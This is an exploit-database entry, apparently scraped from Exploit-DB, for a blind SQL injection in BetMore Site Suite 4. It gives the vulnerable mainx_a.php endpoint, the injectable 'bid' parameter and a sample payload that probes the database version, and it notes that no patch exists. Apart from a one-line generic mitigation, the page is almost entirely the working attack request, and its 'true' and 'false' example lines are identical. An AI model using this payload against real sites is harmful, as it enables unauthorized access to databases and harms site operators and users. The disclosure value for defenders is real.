header-logo
Suggest Exploit
vendor:
BetMore Site Suite
by:
BorN To K!LL - h4ck3r
8.8
CVSS
HIGH
Blind-Injection
89
CWE
Product Name: BetMore Site Suite
Affected Version From: 4
Affected Version To: 4
Patch Exists: NO
Related CWE: N/A
CPE: products.epromptc.com/betmore/?pt=4&rfid=55
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

BetMore Site Suite

The BetMore Site Suite version 4 is vulnerable to Blind-Injection. An attacker can exploit this vulnerability by sending a crafted request to the mainx_a.php file with a true-value parameter and a Blind-Injection parameter. An example of such a request is '/mainx_a.php?lngx=12&x=367&xid=2&bid=78222 and substring(version(),1,1)=4'. If the response is true, then the Blind-Injection was successful.

Mitigation:

The vendor should patch the vulnerability by implementing input validation and sanitization.
Source

Exploit-DB raw data:

==
[#] Script: BetMore Site Suite
[#] Version: 4
[#] Link: http://products.epromptc.com/betmore/?pt=4&rfid=55
==
[#] Author: BorN To K!LL - h4ck3r
[#] Contact: SQL@hotmail.co.uk
==
[#] 3xploit:

/mainx_a.php?lngx=[true-value]&x=[true-value]&xid=[true-value]&bid=[Blind-Injection]
==
[#] 3xample:

/mainx_a.php?lngx=12&x=367&xid=2&bid=78222 and substring(version(),1,1)=4    // False ,,
/mainx_a.php?lngx=12&x=367&xid=2&bid=78222 and substring(version(),1,1)=4    // True ,,
==
[#] Greetings:
darkc0de's team , AsbMay's Group , w4ck1ng team , Q8 , and all muslims ..
==